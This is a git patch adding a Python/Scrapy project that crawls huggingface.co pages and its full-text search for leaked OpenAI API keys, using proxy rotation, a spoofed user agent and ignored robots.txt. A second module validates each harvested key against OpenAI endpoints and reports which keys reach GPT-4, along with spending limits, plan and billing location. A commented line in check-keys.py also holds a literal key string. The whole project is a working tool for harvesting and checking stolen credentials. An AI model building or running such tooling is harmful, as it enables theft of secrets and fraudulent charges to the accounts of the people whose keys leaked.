From 15759586e49b4838be6889f500f9f22cf21cd60d Mon Sep 17 00:00:00 2001
From: Cyberes
Date: Sun, 23 Jul 2023 18:11:48 -0600
Subject: [PATCH] add files

---
 .gitignore                                  |   3 +-
 huggingface/__init__.py                     |   0
 huggingface/check-keys.py                   |  75 ++++++++
 huggingface/crawl-search.py                 |  11 ++
 huggingface/crawl-site.py                   |  10 ++
 huggingface/huggingface/__init__.py         |   0
 huggingface/huggingface/items.py            |  12 ++
 huggingface/huggingface/middlewares.py      | 128 ++++++++++++++
 huggingface/huggingface/pipelines.py        |  35 ++++
 huggingface/huggingface/settings.py         | 103 +++++++++++
 huggingface/huggingface/spiders/__init__.py |   4 +
 .../huggingface/spiders/huggingface.py      |  35 ++++
 huggingface/huggingface/spiders/search.py   |  31 ++++
 huggingface/keychecker/__init__.py          |   0
 huggingface/keychecker/check.py             | 165 ++++++++++++++++++
 huggingface/scrapy.cfg                      |  11 ++
 requirements.txt                            |   5 +
 17 files changed, 627 insertions(+), 1 deletion(-)
 create mode 100644 huggingface/__init__.py
 create mode 100644 huggingface/check-keys.py
 create mode 100644 huggingface/crawl-search.py
 create mode 100644 huggingface/crawl-site.py
 create mode 100644 huggingface/huggingface/__init__.py
 create mode 100644 huggingface/huggingface/items.py
 create mode 100644 huggingface/huggingface/middlewares.py
 create mode 100644 huggingface/huggingface/pipelines.py
 create mode 100644 huggingface/huggingface/settings.py
 create mode 100644 huggingface/huggingface/spiders/__init__.py
 create mode 100644 huggingface/huggingface/spiders/huggingface.py
 create mode 100644 huggingface/huggingface/spiders/search.py
 create mode 100644 huggingface/keychecker/__init__.py
 create mode 100644 huggingface/keychecker/check.py
 create mode 100644 huggingface/scrapy.cfg
 create mode 100644 requirements.txt

diff --git a/.gitignore b/.gitignore
index 5d381cc..309e3a1 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1,3 +1,5 @@
+.idea
+
 # ---> Python
 # Byte-compiled / optimized / DLL files
 __pycache__/
@@ -159,4 +161,3 @@ cython_debug/
 # and can be added to the global gitignore or merged into this file. For a more nuclear
 # option (not recommended) you can uncomment the following to ignore the entire idea folder.
 #.idea/
-
diff --git a/huggingface/__init__.py b/huggingface/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/huggingface/check-keys.py b/huggingface/check-keys.py
new file mode 100644
index 0000000..3ae0035
--- /dev/null
+++ b/huggingface/check-keys.py
@@ -0,0 +1,75 @@
+import argparse
+import concurrent
+from concurrent.futures import ThreadPoolExecutor
+from pathlib import Path
+
+from keychecker.check import check_key
+
+
+def process_key(key):
+    result = check_key(key)
+    if not len(result['errors']):
+        if result['has_gpt_4'] or result['has_only_turbo'] or result['has_gpt_4_32k']:
+            print(result)
+            return result
+    return None
+
+
+def main():
+    parser = argparse.ArgumentParser(description='Check a list of OpenAI API keys.')
+    parser.add_argument('input_file', help='Path to the file containing the keys.')
+    args = parser.parse_args()
+
+    input_file = Path(args.input_file).resolve().absolute()
+
+    if not input_file.exists():
+        print('Input file does not exist:', input_file)
+        quit(1)
+
+    with open(input_file) as f:
+        content = set(f.read().splitlines())
+
+    # content = ['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']
+
+    gpt_4 = set()
+    gpt_4_32k = set()
+    gpt_3 = set()
+
+    with ThreadPoolExecutor(max_workers=50) as executor:
+        results = executor.map(process_key, content)
+        for result in results:
+            if result is not None:
+                if result['has_gpt_4']:
+                    gpt_4.add(result['api_key'])
+                if result['has_gpt_4_32k']:
+                    gpt_4_32k.add(result['api_key'])
+                if result['has_only_turbo']:
+                    gpt_3.add(result['api_key'])
+    print('')
+
+    print('GPT4 KEYS:')
+    if not len(gpt_4):
+        print('none')
+    else:
+        for key in gpt_4:
+            print(key)
+    print('')
+
+    print('GPT4-32k KEYS:')
+    if not len(gpt_4_32k):
+        print('none')
+    else:
+        for key in gpt_4_32k:
+            print(key)
+    print('')
+
+    print('GPT3 KEYS:')
+    if not len(gpt_3):
+        print('none')
+    else:
+        for key in gpt_3:
+            print(key)
+
+
+if __name__ == "__main__":
+    main()
diff --git a/huggingface/crawl-search.py b/huggingface/crawl-search.py
new file mode 100644
index 0000000..27adc86
--- /dev/null
+++ b/huggingface/crawl-search.py
@@ -0,0 +1,11 @@
+import coloredlogs
+from scrapy.crawler import CrawlerProcess
+from scrapy.utils.project import get_project_settings
+
+from huggingface.spiders.search import HFSearchSpider
+
+if __name__ == "__main__":
+    process = CrawlerProcess(get_project_settings())
+
+    process.crawl(HFSearchSpider)
+    process.start()
diff --git a/huggingface/crawl-site.py b/huggingface/crawl-site.py
new file mode 100644
index 0000000..31529c2
--- /dev/null
+++ b/huggingface/crawl-site.py
@@ -0,0 +1,10 @@
+from scrapy.crawler import CrawlerProcess
+from scrapy.utils.project import get_project_settings
+
+from huggingface.spiders.huggingface import HuggingfaceSpider
+
+if __name__ == "__main__":
+    process = CrawlerProcess(get_project_settings())
+
+    process.crawl(HuggingfaceSpider)
+    process.start()
diff --git a/huggingface/huggingface/__init__.py b/huggingface/huggingface/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/huggingface/huggingface/items.py b/huggingface/huggingface/items.py
new file mode 100644
index 0000000..c3ef36a
--- /dev/null
+++ b/huggingface/huggingface/items.py
@@ -0,0 +1,12 @@
+# Define here the models for your scraped items
+#
+# See documentation in:
+# https://docs.scrapy.org/en/latest/topics/items.html
+
+import scrapy
+
+
+class HuggingfaceItem(scrapy.Item):
+    # define the fields for your item here like:
+    # name = scrapy.Field()
+    pass
diff --git a/huggingface/huggingface/middlewares.py b/huggingface/huggingface/middlewares.py
new file mode 100644
index 0000000..c130961
--- /dev/null
+++ b/huggingface/huggingface/middlewares.py
@@ -0,0 +1,128 @@
+# Define here the models for your spider middleware
+#
+# See documentation in:
+# https://docs.scrapy.org/en/latest/topics/spider-middleware.html
+
+
+# useful for handling different item types with a single interface
+
+
+class HuggingfaceSpiderMiddleware:
+    # Not all methods need to be defined. If a method is not defined,
+    # scrapy acts as if the spider middleware does not modify the
+    # passed objects.
+
+    @classmethod
+    def from_crawler(cls, crawler):
+        # This method is used by Scrapy to create your spiders.
+        s = cls()
+        crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
+        return s
+
+    def process_spider_input(self, response, spider):
+        # Called for each response that goes through the spider
+        # middleware and into the spider.
+
+        # Should return None or raise an exception.
+        return None
+
+    def process_spider_output(self, response, result, spider):
+        # Called with the results returned from the Spider, after
+        # it has processed the response.
+
+        # Must return an iterable of Request, or item objects.
+        for i in result:
+            yield i
+
+    def process_spider_exception(self, response, exception, spider):
+        # Called when a spider or process_spider_input() method
+        # (from other spider middleware) raises an exception.
+
+        # Should return either None or an iterable of Request or item objects.
+        pass
+
+    def process_start_requests(self, start_requests, spider):
+        # Called with the start requests of the spider, and works
+        # similarly to the process_spider_output() method, except
+        # that it doesn’t have a response associated.
+
+        # Must return only requests (not items).
+        for r in start_requests:
+            yield r
+
+    def spider_opened(self, spider):
+        spider.logger.info("Spider opened: %s" % spider.name)
+
+
+class HuggingfaceDownloaderMiddleware:
+    # Not all methods need to be defined. If a method is not defined,
+    # scrapy acts as if the downloader middleware does not modify the
+    # passed objects.
+
+    @classmethod
+    def from_crawler(cls, crawler):
+        # This method is used by Scrapy to create your spiders.
+        s = cls()
+        crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
+        return s
+
+    def process_request(self, request, spider):
+        # Called for each request that goes through the downloader
+        # middleware.
+
+        # Must either:
+        # - return None: continue processing this request
+        # - or return a Response object
+        # - or return a Request object
+        # - or raise IgnoreRequest: process_exception() methods of
+        #   installed downloader middleware will be called
+        return None
+
+    def process_response(self, request, response, spider):
+        # Called with the response returned from the downloader.
+
+        # Must either;
+        # - return a Response object
+        # - return a Request object
+        # - or raise IgnoreRequest
+        return response
+
+    def process_exception(self, request, exception, spider):
+        # Called when a download handler or a process_request()
+        # (from other downloader middleware) raises an exception.
+
+        # Must either:
+        # - return None: continue processing this exception
+        # - return a Response object: stops process_exception() chain
+        # - return a Request object: stops process_exception() chain
+        pass
+
+    def spider_opened(self, spider):
+        spider.logger.info("Spider opened: %s" % spider.name)
+
+
+from itertools import cycle
+
+from scrapy import signals
+from scrapy.exceptions import NotConfigured
+
+
+class RoundRobinProxyMiddleware:
+    def __init__(self, proxies):
+        if not proxies:
+            raise NotConfigured
+        self.proxies = cycle(proxies)
+
+    @classmethod
+    def from_crawler(cls, crawler):
+        proxies = crawler.settings.getlist('PROXIES')
+        if not proxies:
+            raise NotConfigured
+        return cls(proxies)
+
+    def process_request(self, request, spider):
+        request.meta['proxy'] = next(self.proxies)
+
+    def process_exception(self, request, exception, spider):
+        request.meta['proxy'] = next(self.proxies)
+        return request
diff --git a/huggingface/huggingface/pipelines.py b/huggingface/huggingface/pipelines.py
new file mode 100644
index 0000000..78e0711
--- /dev/null
+++ b/huggingface/huggingface/pipelines.py
@@ -0,0 +1,35 @@
+from scrapy import Field, Item
+
+
+# Define your item pipelines here
+#
+# Don't forget to add your pipeline to the ITEM_PIPELINES setting
+# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html
+
+
+# useful for handling different item types with a single interface
+
+
+class HuggingfacePipeline:
+    def process_item(self, item, spider):
+        return item
+
+
+class FoundItem(Item):
+    url = Field()
+    matches = Field()
+
+
+class FilePipeline:
+    def open_spider(self, spider):
+        self.file = open(spider.filename or 'items.txt', 'w')
+
+    def close_spider(self, spider):
+        self.file.close()
+
+    def process_item(self, item, spider):
+        # line = f"URL: {item['url']}, Matches: {item['matches']}\n"
+        for m in item['matches']:
+            self.file.write(m + '\n')
+        self.file.flush()  # Ensure the data is written to the disk immediately
+        return item
diff --git a/huggingface/huggingface/settings.py b/huggingface/huggingface/settings.py
new file mode 100644
index 0000000..0f63c92
--- /dev/null
+++ b/huggingface/huggingface/settings.py
@@ -0,0 +1,103 @@
+# Scrapy settings for huggingface project
+#
+# For simplicity, this file contains only settings considered important or
+# commonly used. You can find more settings consulting the documentation:
+#
+#     https://docs.scrapy.org/en/latest/topics/settings.html
+#     https://docs.scrapy.org/en/latest/topics/downloader-middleware.html
+#     https://docs.scrapy.org/en/latest/topics/spider-middleware.html
+
+BOT_NAME = "huggingface"
+
+SPIDER_MODULES = ["huggingface.spiders"]
+NEWSPIDER_MODULE = "huggingface.spiders"
+
+# Crawl responsibly by identifying yourself (and your website) on the user-agent
+USER_AGENT = "Mozilla/5.0 (iPhone; CPU iPhone OS 16_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/115.0.5790.130 Mobile/15E148 Safari/604.1"
+
+# Obey robots.txt rules
+ROBOTSTXT_OBEY = False
+
+# Configure maximum concurrent requests performed by Scrapy (default: 16)
+CONCURRENT_REQUESTS = 100
+
+# Configure a delay for requests for the same website (default: 0)
+# See https://docs.scrapy.org/en/latest/topics/settings.html#download-delay
+# See also autothrottle settings and docs
+DOWNLOAD_DELAY = 0
+# The download delay setting will honor only one of:
+# CONCURRENT_REQUESTS_PER_DOMAIN = 16
+# CONCURRENT_REQUESTS_PER_IP = 16
+
+# Disable cookies (enabled by default)
+COOKIES_ENABLED = False
+
+# Disable Telnet Console (enabled by default)
+# TELNETCONSOLE_ENABLED = False
+
+# Override the default request headers:
+# DEFAULT_REQUEST_HEADERS = {
+#    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
+#    "Accept-Language": "en",
+# }
+
+# Enable or disable spider middlewares
+# See https://docs.scrapy.org/en/latest/topics/spider-middleware.html
+# SPIDER_MIDDLEWARES = {
+#    "huggingface.middlewares.HuggingfaceSpiderMiddleware": 543,
+# }
+
+# Enable or disable downloader middlewares
+# See https://docs.scrapy.org/en/latest/topics/downloader-middleware.html
+DOWNLOADER_MIDDLEWARES = {
+    "huggingface.middlewares.RoundRobinProxyMiddleware": 100,
+}
+
+# Enable or disable extensions
+# See https://docs.scrapy.org/en/latest/topics/extensions.html
+# EXTENSIONS = {
+#    "scrapy.extensions.telnet.TelnetConsole": None,
+# }
+
+# Configure item pipelines
+# See https://docs.scrapy.org/en/latest/topics/item-pipeline.html
+ITEM_PIPELINES = {
+    "huggingface.pipelines.FilePipeline": 300,
+}
+
+# Enable and configure the AutoThrottle extension (disabled by default)
+# See https://docs.scrapy.org/en/latest/topics/autothrottle.html
+# AUTOTHROTTLE_ENABLED = True
+# The initial download delay
+# AUTOTHROTTLE_START_DELAY = 5
+# The maximum download delay to be set in case of high latencies
+# AUTOTHROTTLE_MAX_DELAY = 60
+# The average number of requests Scrapy should be sending in parallel to
+# each remote server
+# AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
+# Enable showing throttling stats for every response received:
+# AUTOTHROTTLE_DEBUG = False
+
+# Enable and configure HTTP caching (disabled by default)
+# See https://docs.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
+# HTTPCACHE_ENABLED = True
+# HTTPCACHE_EXPIRATION_SECS = 0
+# HTTPCACHE_DIR = "httpcache"
+# HTTPCACHE_IGNORE_HTTP_CODES = []
+# HTTPCACHE_STORAGE = "scrapy.extensions.httpcache.FilesystemCacheStorage"
+
+# Set settings whose default value is deprecated to a future-proof value
+REQUEST_FINGERPRINTER_IMPLEMENTATION = "2.7"
+TWISTED_REACTOR = "twisted.internet.asyncioreactor.AsyncioSelectorReactor"
+FEED_EXPORT_ENCODING = "utf-8"
+
+PROXIES = [
+    "http://172.0.4.7:3128",
+    "http://172.0.4.8:3128",
+    "http://172.0.4.10:3128",
+    "http://172.0.4.12:3128",
+]
+
+LOG_LEVEL = 'CRITICAL'
+
+HTTPCACHE_ENABLED = True
diff --git a/huggingface/huggingface/spiders/__init__.py b/huggingface/huggingface/spiders/__init__.py
new file mode 100644
index 0000000..ebd689a
--- /dev/null
+++ b/huggingface/huggingface/spiders/__init__.py
@@ -0,0 +1,4 @@
+# This package will contain the spiders of your Scrapy project
+#
+# Please refer to the documentation for information on how to create and manage
+# your spiders.
diff --git a/huggingface/huggingface/spiders/huggingface.py b/huggingface/huggingface/spiders/huggingface.py
new file mode 100644
index 0000000..ff36b84
--- /dev/null
+++ b/huggingface/huggingface/spiders/huggingface.py
@@ -0,0 +1,35 @@
+import logging
+import re
+import time
+
+import coloredlogs
+from scrapy.linkextractors import LinkExtractor
+from scrapy.spiders import CrawlSpider, Rule
+
+from ..pipelines import FoundItem
+
+
+class HuggingfaceSpider(CrawlSpider):
+    name = "huggingface"
+    allowed_domains = ["huggingface.co"]
+    start_urls = ["https://huggingface.co/"]
+    logger = logging.getLogger('HuggingfaceSpider')
+    logger.setLevel(logging.DEBUG)
+    coloredlogs.install(logger=logger, level=logging.DEBUG)
+
+    rules = (
+        Rule(LinkExtractor(allow_domains=allowed_domains), callback='parse_start_url', follow=True),
+    )
+
+    def __init__(self, *args, **kwargs):
+        super(HuggingfaceSpider, self).__init__(*args, **kwargs)
+        self.regex = re.compile(r'sk-[a-zA-Z0-9]{47}')
+        self.filename = f'found-keys-site-{int(time.time())}.txt'
+
+    def parse_start_url(self, response):
+        self.logger.debug(f"Status: {response.status}, URL: {response.url}")
+        text = response.text
+        matches = self.regex.findall(text)
+        if matches:
+            self.logger.error(f"{matches}")
+            return FoundItem(url=response.url, matches=matches)
diff --git a/huggingface/huggingface/spiders/search.py b/huggingface/huggingface/spiders/search.py
new file mode 100644
index 0000000..70b7286
--- /dev/null
+++ b/huggingface/huggingface/spiders/search.py
@@ -0,0 +1,31 @@
+import logging
+import re
+import time
+
+import coloredlogs
+import scrapy
+
+from ..pipelines import FoundItem
+
+
+class HFSearchSpider(scrapy.Spider):
+    name = "huggingface_search"
+    allowed_domains = ["huggingface.co"]
+    start_urls = ['https://huggingface.co/search/full-text?q=sk-{}&limit=100&skip={}'.format(i, j * 100) for i in ['a', 'h', 'm', 'q'] for j in range(10)]
+    logger = logging.getLogger('HFSearchSpider')
+    logger.setLevel(logging.DEBUG)
+    coloredlogs.install(logger=logger, level=logging.DEBUG)
+
+    def __init__(self, *args, **kwargs):
+        super(HFSearchSpider, self).__init__(*args, **kwargs)
+        self.filename = f'found-keys-{int(time.time())}.txt'
+
+    def parse(self, response):
+        self.logger.debug(f"Status: {response.status}, URL: {response.url}")
+        keys = re.findall(r'(sk-.)([a-zA-Z0-9]{47})', response.text)
+        found_keys = set()
+        for key in keys:
+            found_keys.add(''.join(key))
+        if len(found_keys):
+            self.logger.error(f"{found_keys}")
+            yield FoundItem(url=response.url, matches=found_keys)
diff --git a/huggingface/keychecker/__init__.py b/huggingface/keychecker/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/huggingface/keychecker/check.py b/huggingface/keychecker/check.py
new file mode 100644
index 0000000..5653fed
--- /dev/null
+++ b/huggingface/keychecker/check.py
@@ -0,0 +1,165 @@
+# -*- coding: utf-8 -*-
+import logging
+import threading
+import time
+from datetime import datetime
+
+import openai
+import requests
+
+desired_models = ["gpt-3.5-turbo", "gpt-4", "gpt-4-32k"]
+
+
+def list_models(api_key):
+    openai.api_key = api_key
+    models = openai.Model.list()
+    return [model.id for model in models['data']]
+
+
+def filter_models(models):
+    return [model for model in models if model in desired_models]
+
+
+def get_limits(api_key):
+    headers = {
+        "authorization": f"Bearer {api_key}",
+        "Referer": "https://platform.openai.com/account/usage",
+    }
+    response = requests.get("https://api.openai.com/dashboard/billing/subscription", headers=headers)
+
+    if response.status_code == 200:
+        return True, response.json()
+    else:
+        return False, response.text
+
+
+key_test_lock = threading.Lock()
+
+
+def try_complete(api_key):
+    with key_test_lock:
+        openai.api_key = api_key
+        response = openai.ChatCompletion.create(
+            model="gpt-3.5-turbo",
+            max_tokens=1,
+            messages=[{'role': 'user', 'content': ''}]
+        )
+
+
+# def test_key(api_key):
+#     # with key_test_lock:  # not 100% sure it's thread-safe
+#     openai.api_key = api_key
+#     try:
+#         response = openai.Completion.create(
+#             engine="gpt-3.5-turbo",
+#             prompt='Hello there!',
+#             max_tokens=100
+#         )
+#         print(response.choices[0].text.strip())
+#         return True
+#     except Exception as e:
+#         print(f"An error occurred: {e}")
+#         return False
+
+
+def check_key(api_key, retry_count=3):
+    result = f"{api_key}\n"
+    has_gpt_4_32k = False
+    model_ids = []
+    errors = []
+
+    usage_and_limits_success, usage_and_limits = get_limits(api_key)
+    if not usage_and_limits_success:
+        return {
+            'api_key': api_key,
+            'has_gpt_4': None,
+            'has_gpt_4_32k': None,
+            'has_only_turbo': None,
+            'org_id': None,
+            'soft_limit_usd': None,
+            'hard_limit_usd': None,
+            'access_until': None,  # .strftime('%Y-%m-%d %H:%M:%S'),
+            'plan': None,
+            'plan_id': None,
+            'address': None,
+            'errors': usage_and_limits
+        }
+
+    if usage_and_limits is None:
+        logging.error(f"Failed to get usage and limits for API key {api_key}")
+        return
+    plan = usage_and_limits.get('plan')
+    if plan is None:
+        plan_title = ''
+        plan_id = ''
+    else:
+        plan_title = plan.get('title', '')
+        plan_id = plan.get('id', '')
+    access_until = datetime.fromtimestamp(usage_and_limits['access_until'])
+    org_id = usage_and_limits.get('account_name', '')
+    billing_address = usage_and_limits.get('billing_address', {})
+    if billing_address is not None:
+        billing_country = billing_address.get('country', '')
+        billing_city = billing_address.get('city', '')
+    else:
+        billing_country = ''
+        billing_city = ''
+    is_canceled = usage_and_limits.get('canceled', False)
+    canceled_at_raw = usage_and_limits.get('canceled_at', '')
+    canceled_at = datetime.fromtimestamp(canceled_at_raw) if canceled_at_raw is not None else None
+
+    models = list_models(api_key)
+    filtered_models = filter_models(models)
+
+    if filtered_models:
+        for model_id in filtered_models:
+            result += f" - {model_id}\n"
+            model_ids.append(model_id)
+    else:
+        result += " No desired models available.\n"
+
+    has_gpt_4 = "gpt-4" in model_ids
+    has_gpt_4_32k = "gpt-4-32k" in model_ids
+    has_only_turbo = "gpt-3.5-turbo" in model_ids and not has_gpt_4
+
+    try:
+        for attempts in range(retry_count):
+            try:
+                try_complete(api_key)
+                break
+            except Exception as e:
+                error_message = str(e)
+                if "The server is overloaded or not ready yet" in error_message:
+                    logging.info(f'Error encountered when generating a completion on attempt {attempts + 1}: {error_message}. Retrying...')
+                    time.sleep(5)
+                    continue
+                else:
+                    raise e
+    except Exception as e:
+        error_message = str(e)
+        if "You exceeded your current quota" in error_message and is_canceled:
+            errors.append('You exceeded your current quota')
+        elif "You exceeded your current quota" in error_message and not is_canceled:
+            errors.append('This key has exceeded its current quota')
+        elif "Your account is not active" in error_message:
+            errors.append('Error: Your account is not active, please check your billing details on our website.')
+        else:
+            errors.append(error_message)
+
+    # api_key_works = test_key(api_key)
+
+    return {
+        'api_key': api_key,
+        # 'api_key_works': api_key_works,
+        'has_gpt_4': has_gpt_4,
+        'has_gpt_4_32k': has_gpt_4_32k,
+        'has_only_turbo': has_only_turbo,
+        'org_id': org_id,
+        'soft_limit_usd': usage_and_limits['soft_limit_usd'],
+        'hard_limit_usd': float(usage_and_limits['hard_limit_usd']),
+        'access_until': access_until,  # .strftime('%Y-%m-%d %H:%M:%S'),
+        'plan': plan_title,
+        'plan_id': plan_id,
+        'address': f'{billing_country}, {billing_city}',
+        'errors': errors
+    }
diff --git a/huggingface/scrapy.cfg b/huggingface/scrapy.cfg
new file mode 100644
index 0000000..c1762b0
--- /dev/null
+++ b/huggingface/scrapy.cfg
@@ -0,0 +1,11 @@
+# Automatically created by: scrapy startproject
+#
+# For more information about the [deploy] section see:
+# https://scrapyd.readthedocs.io/en/latest/deploy.html
+
+[settings]
+default = huggingface.settings
+
+[deploy]
+#url = http://localhost:6800/
+project = huggingface
diff --git a/requirements.txt b/requirements.txt
new file mode 100644
index 0000000..856695f
--- /dev/null
+++ b/requirements.txt
@@ -0,0 +1,5 @@
+beautifulsoup4
+requests
+scrapy
+coloredlogs
+openai
\ No newline at end of file